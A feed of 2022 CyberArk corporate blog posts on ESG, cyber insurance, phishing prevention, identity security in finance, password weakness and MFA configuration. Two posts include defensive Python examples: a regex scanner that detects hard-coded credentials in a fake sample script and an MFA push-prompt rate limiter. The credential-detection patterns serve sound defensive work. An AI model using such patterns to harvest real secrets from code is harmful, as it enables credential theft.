As Senior Vice President of Investor Relations and ESG at CyberArk, I am honored to share some milestones in our continued ESG journey. You can learn more about these important initiatives and our work to create a more equitable and sustainable company in our 2022 CyberArk ESG report.

  • Cybersecurity is our business. In our mission to empower customers to move Fearlessly Forward, helping them secure their data is our north star and a clear ESG priority. We have an obligation to uphold the highest standards of security. A few examples of this commitment in action include conducting rigorous internal cybersecurity and data privacy training for approximately 100% of all of our employees, and receiving SOC-2 Type II certification for five of our SaaS solutions.
  • Our people are our greatest asset, and our culture is one of the key ingredients in CyberArk’s success. We achieved an 84% employee satisfaction score — well above industry benchmarks — and were once again recognized as a “Best Place to Work” by Boston Business Journal, reflecting our commitment to creating a community where every voice belongs and feels empowered to be the best version of themselves.

  • Employee well-being and empowerment extend to ongoing learning, career development and management training programs. In 2021, CyberArk employees logged more than 17,000 hours of training — an average of more than eight hours per person.
  • We also took important strides in cultivating a more diverse, equitable and inclusive (DE&I) culture and are particularly excited about launching two new employee resource groups (ERGs). CYBR Women is a global community for the incredible women in Identity Security at CyberArk, strengthened by mentorship and training offered through our “Boost Your Career Program,” which also launched in 2021. And thanks to the amazing work of CYBR Pride ERG champions, our employees say this growing community of LGBTQIA2S+ and ally members supports “a safe space to share experiences” and “promotes diversity.”
  • We believe that bringing more women into the cybersecurity profession, as well as retaining and elevating more women to leadership positions, is essential to addressing widespread talent shortages and driving continued innovation. This belief is reflected in our hiring practices. We increased our percentage of new female hires to 25% in 2021 from 19% in 2019. Thirty-three percent of our management team is female.

We are proud to be ahead of the cybersecurity industry on key diversity initiatives but also know there’s much work to be done. In 2023 and beyond, we will continue to invest in our people, nurture a culture of representation and belonging and help our communities.

  • We are also working to reduce our impact on the environment. Measuring our carbon footprint was an important first step in understanding where we are today. By completing a third-party Scope 1 and Scope 2 greenhouse gas (GHG) emissions analysis, we now have a baseline measurement and are working on a program to reduce our carbon footprint.
  • We know that sustainability requires action — especially when it comes to protecting the world’s forests, which play a critical role in capturing and sequestering carbon and sustaining millions of people. Committed to doing our part, we’ve planted 800 trees and counting as part of our new hire and employee recognition programs. Led by our Green Teams, we’re learning, exploring and enabling initiatives to keep our business environmentally sustainable.

Building ESG Momentum as We Move Forward

ESG is a journey. We’re proud of what we’ve accomplished as a team and are energized by the initiatives we’re tackling today to make a strong impact. It’s also gratifying to see three leading independent ESG ratings agencies give CyberArk high marks for our progress. An “AA” rating from MSCI ESG Ratings, a “Low Risk” rating from Sustainalytics and a “Prime” rating from ISS ESG position CyberArk as one of the top performers in our industry in managing the most significant ESG risks.

We know that embedding ESG into our decision-making and operating rhythm will only strengthen our ability to move businesses Fearlessly Forward and enhance value for CyberArk employees, customers, partners, investors and others who rely on us.

Data is key to making measurable progress and enhancing transparency. We’re building a strong foundation on which to grow by establishing ESG-related key performance indicators (KPIs), setting goals to hold ourselves accountable and enhancing our governance and compliance processes.

We encourage you to read the full ESG report and value feedback as we move fearlessly and sustainably forward.


]]>
2023 Cyber Insurance Looks Different. Are You Ready? https://www.cyberark.com/blog/2023-cyber-insurance-looks-different-are-you-ready/ Fri, 21 Oct 2022 13:00:20 +0000 https://www.cyberark.com/?p=135823

Rampant ransomware attacks have made cyber insurance a C-suite priority. Despite the raised consciousness, it’s more difficult than ever to secure or renew a policy. Nefarious activity continues to put pressure on carriers who are responding with even higher premiums and stricter underwriting requirements as they aim to mitigate risks. What was considered acceptable for 2022 may not be considered acceptable for 2023.

The takeaway for companies in the market for cyber insurance is this: Get ready to answer a litany of pre-audit questions and demonstrate a hardened defense strategy.

Top Challenges Shaping Today’s Global Cyber Insurance Market

The growing frequency and sophistication of cyberattacks, especially on the ransomware front, have compelled even more companies to seek coverage. As we’ve previously covered, many cyber insurance providers have reported massive direct-loss ratios for standalone policies. They continue to struggle to adequately cover escalating costs, and things are changing fast. Consider The Marsh & McLennan Cos. Global Insurance Market Index, which found that U.S. cyber insurance prices skyrocketed in the second quarter of 2022, up 79% from a year ago after more than doubling in the two prior quarters.

I spoke about this at the 2022 CyberArk Impact event in Boston alongside CJ Dietzman, CISSP, CISA and managing director and cybersecurity marketplace leader at Marsh Specialty. During our talk he noted, “The ransomware epidemic eviscerated the profitability of cyber insurance. Five to seven years ago, you could fill out a one-page cyber insurance application and answer a handful of questions. Fast forward and the world has changed. Getting insurance with favorable terms, conditions, pricing coverage and low retention is hard right now.”

Insurers aren’t just considering ransomware risk as they tighten up qualifications. Current market volatility and continued geopolitical tensions also factor into the equation. SolarWinds, Kaseya, Log4j and other high-profile incidents have intensified concerns around software supply chain risks, prompting new questions around aggregation exposure and systemic losses. Meanwhile, global privacy regulations continue to evolve in patchwork fashion, and litigation and fines are growing — fueling even more underwriting questions.

With premiums climbing, HelpNetSecurity reports the number of organizations that won’t be able to afford cyber insurance, or that will be declined or offered limited coverage, is set to double in 2023.

2023 Requirements Will Dig Deep. A Solid Controls Narrative Provides an Edge

Scoring a policy or renewal with the right terms may be difficult, but it’s not impossible. Dietzman confirmed carriers and underwriters are responding favorably to companies instituting robust security controls and incident response plans — especially those prepared to dive deep into their cybersecurity architectures and planned roadmaps. “It’s important to articulate a meaningful risk-based approach to cybersecurity. If you do, you’re sitting on high water,” Dietzman explained.

Underwriters often assess security systems and practices by using open-source scanning tools like OpenVAS and OpenSCAP to probe an applicant’s networks for vulnerabilities and security rating services like SecurityScorecard and BitSight to evaluate risk. Many underwriters partner with outside cybersecurity firms to vet customers.

During these evaluations, they’re looking for evidence of specific cybersecurity controls and practices, and upcoming 2023 audits will examine certain areas more closely than ever before.

Since ransomware attacks typically start on workstations and servers, endpoint security will be under the microscope. Initially, insurers wanted to see that a company trained its employees in phishing and credential theft techniques and used endpoint detection and response (EDR/XDR) solutions to help identify and remediate suspicious activity.

But while training and EDR/XDR solutions are both critical (and still required by most insurers), attackers are constantly switching things up. This makes it very difficult for employees to reliably recognize new attack techniques and also means sophisticated attackers have found ways to turn off or bypass EDR/XDR by abusing administrative credentials, as seen in the SolarWinds attack. This has prompted more underwriting scrutiny around endpoint privilege controls, especially a company’s ability to remove local admin rights from all users — senior system administrators, developers and even people using legacy applications that require admin rights. The big challenge for organizations here will be finding the right balance between least privilege control and operational efficiency.

Requirements for multifactor authentication (MFA) — a checkmark item for insurers until recently — are also growing. Insurers started to dig deeper as more post-payout analyses revealed MFA wasn’t being fully utilized, particularly in the healthcare and higher education sectors. They found major coverage gaps for privileged accounts, which are often not tied to a specific person (for example, the built-in administrator account that exists on every server) but are shared by system administrators and other privileged users and guard sensitive data. As a result, underwriters have started mandating privileged access management (PAM) for privileged accounts not tied to specific users (local admin, root and service accounts) as the way to bring them under MFA, along with isolation of high-value assets.

Insurers are also looking at how organizations authenticate third-party privileged users from vendor organizations who need access to sensitive data and company systems. Vendors require the same security, yet they are rarely given the same security consideration as employees. For instance, if a vendor is onboarded for a brief two-week engagement, they should be onboarded and offboarded following the same HR processes as a new employee to minimize risk.

This heightened focus on privileged access management is starting to extend beyond human identities to non-human identities, which typically outnumber human identities by 45:1. These “machine identities” could be service accounts, hardcoded secrets or any off-the-shelf or homegrown solution requiring powerful credentials to perform its function (for example, configuration management database (CMDB) platforms and DevOps orchestration tools), along with automated processes such as robotic process automation (RPA). As part of this, insurers are looking for stronger privileged controls around automated patch management systems, vulnerability scanners and other existing security tools that attackers may try to disable.

Beyond technology safeguards, insurance carriers still want to see sound people practices, such as conducting ongoing cybersecurity awareness training. They’ll also evaluate data backup practices and incident response plans to understand how quickly the organization could restore operations in the wake of an attack.

Steps in the Right Direction

As companies prepare for cyber insurance renewals, they should be cognizant that security control requirements are evolving to address the fast-paced world of digital business.

Yet accelerated change is always difficult from an organizational and cultural standpoint and can stir up fear and uncertainty. The best way to minimize this is to make sure people understand the “why,” and that risk mitigation controls will not impact operational efficiency. It’s important for companies to spend time on the education factor.

The good news is that more companies are stepping up to the plate and taking meaningful steps to bolster their ransomware defenses. As stronger controls are implemented and used more effectively, insurer losses are starting to stabilize and soften the market a bit. We’re not out of the woods yet, but we’re starting to move in the right direction.

As organizations work to meet today’s requirements with an eye on the future, their focus must remain on effectively mitigating cyber risk without slowing business down.

Organizations looking to close security gaps within a specified period to either land or maintain a cyber insurance policy can benefit by aligning with the right security partner. CyberArk can play that role, helping you strengthen security, meet pre-audit requirements, keep premiums down and maintain business velocity. To learn more, check out our cyber insurance resources.

]]>
Eight Phishing Prevention Steps for Business https://www.cyberark.com/blog/eight-phishing-prevention-steps-for-business/ Tue, 18 Oct 2022 13:00:23 +0000 https://www.cyberark.com/?p=135575

Cybersecurity Awareness Month 2022 prioritizes education for improving phishing recognition and reporting. Security leaders agree, ranking employee training as the second-most effective defense-in-depth layer for ransomware protection. Overall security awareness is up, but cyberattackers keep phishing. The question is, why do people keep biting?

Inherent Trust Gives Phishing Attackers a Leg Up

Psychological studies on everything from brain chemistry to infant behavior to Ponzi schemes suggest we can’t help ourselves: Humans are hardwired to trust.

Since the beginning of time, criminals have studied human behavior to exploit trust (remember the Trojan Horse in history class?). Only their methods have changed, and they keep getting better with technology’s help. Today, as users work from anywhere, toggling frequently between corporate and personal devices, these factors work in attackers’ favor:

  • Easier social engineering. Employees are conducting more of their personal lives online, making it easy for attackers to conduct reconnaissance and connect with them on social networks. When someone has access to a valuable corporate asset, an attacker may spend months building a relationship with them before sending a phishing email containing malicious code.
  • More identities to exploit. The expanded use of SaaS tools is generating new identities that end up inadequately secured and monitored. With some tools, every time a new team is set up, an email account is created for the team to use. An attacker can compromise this account or generate a fake account to send messages to the team.
  • New ways to deceive. With so many new digital tools in the mix, workers may be less likely to question out-of-the-ordinary requests or changes in workflow.

Part of our job as defenders is arming workforce users with the knowledge and skills to thwart phishing attempts. Another is thinking like an attacker, recognizing that someone will slip up, think a phony call is legit, get fatigued by too many MFA prompts or be tricked by some novel phishing tactic.

Eight Ways to Fight Phishing and Move Closer to Zero Trust

People will always have trust issues. This may be why 88% of security leaders agree that Zero Trust is the way. This approach centers on assessing every request to access a corporate resource — data, applications and infrastructure — before granting access and then tightly limiting access for verified users and devices.

Part of viewing cybersecurity through a Zero Trust lens involves taking proactive steps to make your access systems more phishing-resistant, help end users recognize phishing attempts and reduce potential damage by deploying mechanisms to minimize impact if users are lured into taking the bait.

8 anti-phishing steps

  1. Set up phishing-resistant multifactor authentication (MFA). In practice that means FIDO2/WebAuthn authenticators, whether hardware security keys or platform authenticators built into devices: the browser binds each assertion to the site’s real origin and relying-party ID, so a look-alike domain that relays the login cannot reuse it. One-time codes, push approvals and QR-code logins can still be relayed by a phishing site and are not phishing-resistant on their own.
  2. Implement foundational Zero Trust policies like requiring users to register phishing-resistant authenticators, using step-up authentication prompts when sensitive apps are launched or sensitive information is changed, mandating MFA for personal profile modifications and setting up automatic alerts that flag risky user behavior.
  3. Segment your network. This way, when phishing is successful, the attacker’s movement inside the network will be restricted and access to sensitive resources will be blocked.
  4. Secure your devices. Endpoint security hygiene is imperative, as devices are more exposed to phishing and malware in perimeter-less environments. One major operational challenge to overcome will be maintaining a full, up-to-date inventory of users and devices.
  5. Revisit your BYOD policies. The difficulties of verifying devices can be compounded by unmanaged devices. Shipping hardened corporate laptops to remote workers is not always feasible. And workers may still connect to Internet-facing corporate applications from a personal device. Consider implementing minimum standards for strengthening hybrid workers’ home networks, such as changing default router credentials and using strong WiFi passwords.
  6. Conduct periodic phishing exercises. Returning to psychology, a well-known cognitive bias known as the Dunning-Kruger Effect highlights people’s tendency to overestimate their own capabilities. Live-test scenarios and Red Team exercises can help challenge thinking, uncover blind spots and strengthen security defenses.
  7. Foster greater collaboration across various business functions and IT security teams to improve identity governance and lifecycle management practices such as deprovisioning accounts when users exit their roles, conducting “know your employees” assessments, training third-party users and continuously monitoring access.
  8. Lean on expert guidance across people, process and technology. This is where the domain knowledge and experience of your cybersecurity provider matters. With access to educational resources and an expert team that understands your business goals, your security organization can improve outcomes in areas such as access reviews and collections monitoring, virus scan performance testing, penetration testing, resolving stalled workflows and processes, and delivering the right reports for the right stakeholders.

Assuming people will trust too much is woven into Zero Trust’s “trust nothing, verify everything” philosophy. Identity Security offers a set of technologies that can help your organization enable Zero Trust more efficiently. As your team prioritizes phishing prevention this Cybersecurity Awareness Month, the Identity Defined Security Alliance provides a useful framework to help you #BeIdentitySmart and understand the technology components — from devices to network, applications and storage — that require protection at the identity level.

In “Digital or Die” Financial Sector, Identity Security Accelerates Transformation https://www.cyberark.com/blog/financial-services/ Fri, 14 Oct 2022 13:00:33 +0000 https://www.cyberark.com/?p=135487

“Digital or Die” has become the motto for the financial services sector. Consumer expectations are pushing further and further into digital realms — and they’ve never been higher. Take Gen Z users, for instance, who shop primarily online and expect their digital payment options to offer multiple touch points, have clean interfaces and personalize their experiences.

To meet these heightened demands, banks and financial services organizations around the world are transforming the way they do business. They’re digitizing legacy platforms, accelerating cloud migrations and investing in emerging technologies such as artificial intelligence (AI) and internet of things (IoT) to increase agility.

This unprecedented change also means unprecedented opportunity for cyberattackers who look to turn these very innovations against the organizations embracing them. Ransomware actors, specifically, have become incredibly creative. They’re finding and exploiting weaknesses using autonomous decision-making and self-learning capabilities, deploying sophisticated tooling and hands-on-keyboard actions to disable endpoint defenses and targeting data-rich providers upstream, among many evolving methods.

Identity Security as a Financial Business Accelerator

In this ever-expanding threat landscape, “Identity is the strongest security control that every organization must get right,” noted Damon McDougald, global identity and access management (IAM) lead, Accenture, at our CyberArk Impact 2022 event in Boston.

Yet 79% of senior security leaders across industries admit that cybersecurity has taken a back seat to digital transformation initiatives, driving up cybersecurity debt and potentially hamstringing future innovation and growth.

“Security should be a business accelerator — not something that stops the train,” asserted McDougald. “But when it comes to digital transformation, I see a lot of organizations stalled because they can’t authenticate in the cloud, or manage user access or entitlements or policy in the cloud.”

He continued, “The organizations ‘doing digital transformation right’ are those that can figure out how to use identity to enable, and even automate, the transformation up front.”

Accenture and CyberArk: An Innovative Alliance for Financial Services

As financial ecosystems and value chains expand, Accenture and CyberArk have developed an innovative alliance to strengthen financial organizations’ cyber resilience and drive transformation initiatives forward. Here are two recent stories of their joint work with leading financial services organizations around the world:

Addressing audit findings to achieve compliance. After a failed audit and facing regulatory pressures, a U.K.-based financial institution turned to Accenture to implement CyberArk Identity Security solutions to protect privileged access to critical systems (Tiers 1 and 2) and underlying infrastructure. The Accenture team was integral in facilitating an enterprise-wide identity audit, setting up an operating model for onboarding infrastructure and applications into CyberArk, defining required controls and mobilizing stakeholders to drive security change management. The privilege-focused Identity Security program was successful in delivering measurable cyber risk reduction, helping the organization meet compliance requirements, and contributing to millions in audit and change management-related cost savings over time.

Streamlining secure access and building trust. Without a proper way to manage privileged access across an IT environment, cyber risk grows and compliance suffers. A large credit union asked Accenture to help select a comprehensive solution that could store, manage and audit all privileged accounts and users. Accenture helped the credit union select CyberArk, plan for an implementation, design an onboarding strategy for all privileged accounts and develop a roadmap for product maturity. By embracing an Identity Security strategy and onboarding privileged accounts, the credit union was able to meet regulatory requirements, secure administrator access and create a “single-pane of glass” for monitoring and auditing of all privileged accounts.

Identity Security You Can Bank On

“I believe identity and access management professionals have the hardest job in IT today,” said McDougald in his closing Impact remarks. “We have to know how our business operates, we have to integrate tools with the entire organization, we have to enable our organization — and the pressure continues to mount. Fortunately, there are ways to create a frictionless experience that’s highly secure. As IAM professionals, it’s our job to sell that value to our organizations and deliver the tools and approaches that enable business to go at warp speed.”

Identity and security teams don’t have to go it alone. Accenture and CyberArk work together to help financial services organizations secure access for all identities across the enterprise and within customer applications so they can meet consumer expectations and defend against attacks.

Why Strong Passwords Alone Won’t Stop Identity-Based Attacks https://www.cyberark.com/blog/why-strong-passwords-alone-wont-stop-identity-based-attacks/ Wed, 12 Oct 2022 13:00:17 +0000 https://www.cyberark.com/?p=135439

You can buy almost anything online without leaving the couch now. Need groceries? Check. A holiday? Check. Even a new car? It will magically appear in your driveway — no haggling required! Unfortunately, purchasing stolen credentials has become just as simple. In a market where remote desktop protocol (RDP) access can be bought for under $10, both novice fraudsters and sophisticated attackers are snatching up passwords and usernames in bulk.

With lengthy lists of passwords at their disposal, cybercriminals rarely need to flex their creative muscles. Plain old credential stuffing will open a door to an enterprise environment. If it doesn’t, an automated brute-force attack to guess and test username/password variations at scale is a solid backup plan. Of course, some attackers go the extra mile to trick cautious workforce users into giving up their strong passwords with novel phishing and social engineering techniques like those seen lately.

No matter how strong your organization’s password policies and awareness efforts are, they won’t be enough to defend your organization against identity-based attacks on their own.

Here’s why strong passwords are not enough:

Workers know strong passwords are important. They just can’t keep up. 

  • The average staff member accesses more than 30 applications and accounts at work (and roughly 55 others at home). Requiring users to repeatedly authenticate themselves to systems and applications — and to maintain multiple complex passwords — has become too much. So, people continue to change a single digit on their old password when required, save passwords in their browsers or store them in company-provided password managers (built for consumer purposes) and call it a day.
  • Fifty-two percent of an organization’s workforce has direct access to sensitive corporate data. A designation once reserved for IT admins, “privileged users” could mean anyone now — an HR professional, finance manager, developer, third-party vendor — you name it.

Humans aren’t the only ones using passwords and credentials at work.

  • Non-human identities outnumber human identities by a factor of 45x. Yes, you read that correctly.
  • Of these machine identities, 68% have access to sensitive corporate data and assets.
  • As organizations accelerate to hybrid or multi-cloud environments, there are even more gaps (read: human and machine identities) that attackers can use as entry points.

Embedding credentials, overprovisioning cloud permissions and other risky password practices are on the rise.

  • Whether they’re crunched for time, lacking cloud-specific technical skills or feeling pressure from developers and cloud engineering teams, IT teams often overprovision cloud identity and access management (IAM) permissions — giving identities more privileges than they need — in the name of productivity. As excessive cloud permissions pile up with every new IT or transformation initiative, risk exposure grows and cybersecurity debt accumulates.
  • The constant push to operate and deploy faster has also led to more embedded (or hardcoded) credentials and access keys in code. These credentials are rarely (if ever) changed and often left exposed. When powerful credentials for enterprise security systems are embedded into scripts, the result can be disastrous, as seen in the recent Uber breach. By compromising the credentials of a non-privileged user, the attacker was able to locate embedded admin credentials for Uber’s privileged access management (PAM) solution in a misconfigured network share — and in doing so, became a “privileged user” with access to the many powerful credentials stored inside. This emphasized the need for strong defense-in-depth layers surrounding credential vaults and other critical security systems.
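The embedded-credential problem described above is one that a pipeline can check for before code is merged. The following is an added example, not tooling from CyberArk or from the post: a small scanner that walks script lines, flags the common shapes a literal secret takes (a quoted value assigned to a password-like name, user:password in a URL, an AWS access key ID) and skips lines that reference an environment variable instead of a literal. The regexes, the sample script and every value in it are constructed for this example; the `AKIA…EXAMPLE` key is the example key AWS uses in its own documentation, not a live credential.

```python
import re

# Illustrative rules written for this example (not a vendor rule set).
# Each maps a rule name to a pattern for one shape of hard-coded credential.
PATTERNS = {
    # name ending in password/pwd/secret/token/api_key assigned a quoted value of 8+ chars
    "assigned_password": re.compile(
        r"(?i)(pass(word|wd)?|pwd|secret|token|api[_-]?key)\s*[:=]\s*['\"]([^'\"]{8,})['\"]"
    ),
    # scheme://user:password@host
    "url_userinfo": re.compile(r"\b[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@"),
    # AWS access key ID format
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
}

# A value pulled from the environment (or a ${VAR} placeholder resolved at deploy
# time) is not a literal secret, so assigned_password hits on such lines are dropped.
ENV_REF = re.compile(r"(os\.environ|getenv|\$\{?[A-Z_]+\}?|%[A-Z_]+%)")


def scan_lines(lines):
    """Return (line_number, rule_name) for every line that looks like a literal secret.

    Only the rule and line number are reported, never the matched value, so the
    scanner's own output does not leak the secret into CI logs.
    """
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for rule, pattern in PATTERNS.items():
            if not pattern.search(line):
                continue
            if rule == "assigned_password" and ENV_REF.search(line):
                continue  # references a variable, not a literal
            findings.append((lineno, rule))
            break  # one finding per line is enough
    return findings


def report(findings):
    """Human-readable summary, suitable for a CI job log."""
    return [f"line {lineno}: hard-coded credential ({rule})" for lineno, rule in findings]


# Constructed sample script for this example; every credential in it is fake.
SAMPLE_SCRIPT = """\
#!/usr/bin/env python3
# constructed sample for this example; credentials below are fake
import os
DB_HOST = "db.internal.example"
DB_PASSWORD = "Sup3rS3cretValue!"
PAM_API_TOKEN = os.environ["PAM_API_TOKEN"]
BACKUP_URL = "https://svc_backup:Wint3r2022@backup.example/dump"
AWS_KEY = "AKIAIOSFODNN7EXAMPLE"
SMTP_PASS = "${SMTP_PASSWORD}"
"""

if __name__ == "__main__":
    for line in report(scan_lines(SAMPLE_SCRIPT.splitlines())):
        print(line)
```

Run against the sample, the scanner flags lines 5, 7 and 8 and stays quiet on line 6 (a vault or environment lookup) and line 9 (a deploy-time placeholder). Pattern matching of this kind is a coarse first gate; its value is that it runs on every commit, well before a credential lands on a network share.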

IT security teams like yours are drowning everywhere.

  • An enterprise of 1,000 employees spends an estimated $495,000 annually on resolving password issues alone.
  • Password resets are just the tip of the iceberg. IT security departments are struggling to defend against ransomware, software supply chain attacks and more as a lack of skilled workers continues to plague the industry. According to ISSA research, ramifications include increasing workloads for existing team members (62%), unfilled open jobs (38%) and high burnout rates (38%). The U.S. Bureau of Labor Statistics estimates demand for cybersecurity employees will surge 33% from 2020 to 2030. Many of these openings will be from workers transferring out of the profession or exiting the labor force.

Getting rid of passwords completely may seem like the solution to all of this, but the world is not there yet (though decentralized identity on the blockchain and other technology advancements show promise). And traditional password managers and disparate IAM solutions weren’t built to protect and continuously manage the thousands (or tens of thousands) of identities within your enterprise — nor were they intended to reach across the data center, hybrid, multi-cloud and SaaS environments.

As identity-based threats continue to grow and passwords continue to fail, a broader approach is in order. It’s not so much about stopping attackers from getting in anymore; it’s about making it very difficult for them to move around the network without raising red flags and creating so much noise that they become easier to spot and block.

A defense-in-depth Identity Security framework can help take your strong password policies to the next level and move you closer to zero trust. Centered on privileged access management, Identity Security provides the intelligent controls needed to secure any human or machine identity wherever it exists — not just those considered “privileged.” Each individual identity is granted the exact level of access it needs to interact with applications, infrastructures and data — at just the right time — while encircled by continuous threat detection.

Behind the scenes, controls such as session isolation and monitoring, elevation and delegation are infused into access and identity management capabilities to increase accountability and compliance. This means access can be monitored on an ongoing basis across data center, hybrid, multi-cloud and SaaS environments, and risk-based controls can be applied for each identity to keep things simple for end users.

In the spirit of Cybersecurity Awareness Month, consider how elevating your strategy with Identity Security can empower your team to do more, block more attacks and enable more innovation. If you’re ready to take the first step of assessing your environment to discover overprivileged identities, risky permissions and other unknown threats, we’re here to help.

You’ve Enabled MFA — Great! This Cybersecurity Awareness Month, Focus on How and Where It’s Used https://www.cyberark.com/blog/youve-enabled-mfa-great-this-cybersecurity-awareness-month-focus-on-how-and-where-its-used/ Tue, 04 Oct 2022 13:00:22 +0000 https://www.cyberark.com/?p=134902

Decades ago, the internet was built to give people a way to access and share information fast. What it wasn’t built for was safety, which is how we ended up with an entire month dedicated to cybersecurity. And after the year we’ve just had, it’s fitting that Cybersecurity Awareness Month 2022 is focused so heavily on Identity Security behaviors. But if you’re looking for another post on why your organization should be using multifactor authentication (MFA), this isn’t it.

As a fellow cybersecurity professional, I imagine you already know MFA can help block up to 99.9% of account compromise attacks, reduce reliance on risky passwords and simplify user authentication experiences with the help of behavior-based analytics. You understand many security teams (possibly even your own) have taken their first step toward Zero Trust by implementing MFA. You’re also very aware that attackers have gotten better at tricking users into giving up their second authentication factors, and in some instances, they’ve found ways to bypass MFA mechanisms completely.

Your MFA controls need a checkup this Cybersecurity Awareness Month. Start with these seven questions.

Thanks to repeated front-page news coverage, MFA fatigue attacks are likely high on your radar. For these, threat actors employ various digital and voice-based phishing techniques to steal credentials and then send repeated MFA push requests to a target’s mobile device to successfully dupe employees and third-party vendors.

Yes, employee training is an important preventative step. But taking a hard look at how — and where — you’re deploying MFA is even more important. As you do, review these seven questions to help make sure your organization is making the most of its MFA deployment.

Is your MFA system currently…

1. Using standards-based single sign-on (SSO)? Since credentials are inherently vulnerable to compromise, look for every opportunity to use fewer of them. Combining MFA with SSO eliminates user friction by reducing logons and swapping passwords for more intuitive methods like device certificates or biometrics. When possible, use or build SSO tools supporting standard protocols such as SAML or OpenID Connect.

2. Locking down MFA registrations? When MFA is provisioned to a user, you need ways to verify that each user is who they claim to be. Otherwise, attackers can steal passwords and try to register their own devices as authentication factors. To reduce risk, consider using an out-of-band process such as a phone call to check if a registration request was legitimate, only allowing registration for one device per user and requiring a valid physical ID, such as a passport, as part of the user registration process.

3. Limiting MFA prompts? When users get bombarded with requests, they may respond without thinking or out of exasperation. Setting thresholds for the number of MFA prompts a user can get within a certain period can help fight user fatigue and make things harder for attackers.
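Here is what such a threshold looks like as a control, as an added example that is not part of the original post and not a CyberArk implementation. A sliding-window limiter counts the push prompts sent to each user; once the count within the window reaches the limit, further prompts are suppressed and the user is flagged so the help desk can verify them through another channel. The limit (3 prompts in 300 seconds), the user names and the timestamps are all hypothetical values chosen for this example.

```python
from collections import defaultdict, deque
from dataclasses import dataclass, field


@dataclass
class PromptThrottle:
    """Sliding-window limiter for MFA push prompts, keyed by user.

    Policy values are hypothetical, chosen for this example: at most
    max_prompts pushes to one user within window_seconds. Reaching the limit
    suppresses the prompt and flags the user, because a burst of pushes the
    user never asked for is what a push-fatigue attempt looks like.
    """
    max_prompts: int = 3
    window_seconds: int = 300
    _sent: dict = field(default_factory=lambda: defaultdict(deque), repr=False)
    _flagged: set = field(default_factory=set, repr=False)

    def request_prompt(self, user: str, now: float) -> str:
        """Decide whether a push may go to user at time now (seconds).

        Returns "send", "suppress" (limit just reached, user flagged) or
        "blocked" (user already flagged; no pushes until cleared out of band).
        """
        if user in self._flagged:
            return "blocked"
        sent = self._sent[user]
        # Expire timestamps that have fallen outside the window.
        while sent and now - sent[0] >= self.window_seconds:
            sent.popleft()
        if len(sent) >= self.max_prompts:
            self._flagged.add(user)
            return "suppress"
        sent.append(now)
        return "send"

    def is_flagged(self, user: str) -> bool:
        return user in self._flagged

    def clear_flag(self, user: str) -> None:
        """Reset after the user has been verified through another channel."""
        self._flagged.discard(user)
        self._sent[user].clear()


def demo() -> dict:
    """Replay two constructed sequences of authentication attempts."""
    throttle = PromptThrottle()
    # alice: five push requests within 20 seconds, the shape of a bombing run
    alice = [throttle.request_prompt("alice", t) for t in (0, 5, 10, 15, 20)]
    # bob: ordinary logins ten minutes apart, each outside the previous window
    bob = [throttle.request_prompt("bob", t) for t in (0, 600, 1200)]
    return {"alice": alice, "bob": bob, "alice_flagged": throttle.is_flagged("alice")}


if __name__ == "__main__":
    for user, outcome in demo().items():
        print(user, outcome)
```

Alice's fourth request is suppressed and her fifth is blocked outright, while Bob never notices the control exists. The flag is the detection output: it belongs in the same alert stream as the other risky-behavior signals the post recommends, and clearing it should require the out-of-band verification described under question 2.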

4. Strengthened with privileged access management (PAM) controls to protect all channels? This is critical for protecting sensitive resources. With this approach, credentials for accessing a sensitive server, for example, are stored in a centralized vault. MFA is required to log into the vault and check out the credential for the server. Intelligent privileged controls make it possible to isolate sessions, so the credential is not exposed on the endpoint, and monitor all credential usage, regardless of channel.

5. Using analytics to balance security and productivity? You’re part of a rock-star team, but at some point, you all need to sleep. Leaning on AI and machine learning makes it possible to assess each access request based on historical user behavior, device and network patterns in real time. If this context is not “normal,” the system can adapt controls such as requesting reauthentication or adjusting the level of access and automatically detect risky activity earlier in the attack lifecycle. Analytics can help to minimize end-user friction by putting up gates only when absolutely necessary, based on a risk score. What’s more, 90% of organizations employing contextually aware automation can quantify reduced IT effort and costs.

6. Configured to record and monitor user activity in web applications? If not, digging through logs after an incident won’t do you much good. Eighty percent of organizations report employee misuse or abuse of access to business applications, yet nearly half (48%) have limited ability to view user logs and audit user activity. This makes it difficult to understand and control how employees and third-party partners are using web apps and handling confidential data. Take steps to configure your system to record user actions within protected apps, create complete and searchable audit trails and re-prompt users for reauthentication during high-risk sessions (via a QR code scan, for instance). Also consider endpoint controls that prevent users from copying data or downloading files.

7. Supported by layered defense-in-depth controls? Even the most masterfully configured MFA systems aren’t fail-proof. That’s why layering Identity Security controls and practices — such as consistently enforcing least privilege and removing standing access to sensitive infrastructure and cloud consoles — is so critical. If one system falls down, another stands ready to block attacks and keep sensitive assets out of harm’s way.

I hope these questions prompt even more questions about how a unified Identity Security strategy — centered on intelligent privilege controls — can help you and your team #BeIdentitySmart and better defend against attacks, satisfy audit and compliance, enable the digital business and drive operational efficiencies.

If you’re looking to better understand the identity attack chain, brush up on best practices this Cybersecurity Awareness Month or pinpoint identity-based weaknesses in your environment, the CyberArk Blueprint for Identity Security Success is a great place to start.

This Cybersecurity Awareness Month, Set Your Identity Security Strategy to Master Cyber Fundamentals https://www.cyberark.com/blog/this-cybersecurity-awareness-month-set-your-identity-security-strategy-to-master-cyber-fundamentals/ Mon, 03 Oct 2022 13:00:57 +0000 https://www.cyberark.com/?p=134785

As Cybersecurity Awareness Month (CSAM) begins this October, government and private organizations in the United States, the European Union and around the world are promoting safe and secure digital behaviors. The 2022 theme of “See Yourself in Cyber” doesn’t just encourage consumers to #BeCyberSmart in protecting their personal identities and information — it also underscores the role each cybersecurity professional plays in defending their organization and strengthening the broader supply chain ecosystem against pervasive identity-based attacks and data breaches.

Security Practitioners, “See Yourself in Cyber” this CSAM by Reassessing Your Greatest Source of Risk

Though you live in this world year-round as a cybersecurity professional, you can still benefit from taking some time to assess your organization’s security posture and revisit the basics this month. The identity landscape is large, complex and continuously evolving, and even though cyber hygiene practices are widely understood and accepted, this is where things still tend to fall apart.

When they do, human error is often in play: An employee of a third-party vendor falls for a sophisticated phishing attack, and workforce identities get compromised, or a short-staffed cloud team overprovisions cloud IAM permissions, giving machine identities more privileges than they need. Sometimes technology fails: Maybe a security solution wasn’t built for a hybrid environment, or maybe it “drifted” over time as the digital environment evolved. Or perhaps security fundamentals were skipped over for (what seemed at the time to be) more pressing transformation priorities. Despite many varying factors, it ultimately comes back to identity, as seen consistently in major breach headlines since this time last year, and the year before that, and the year before that…

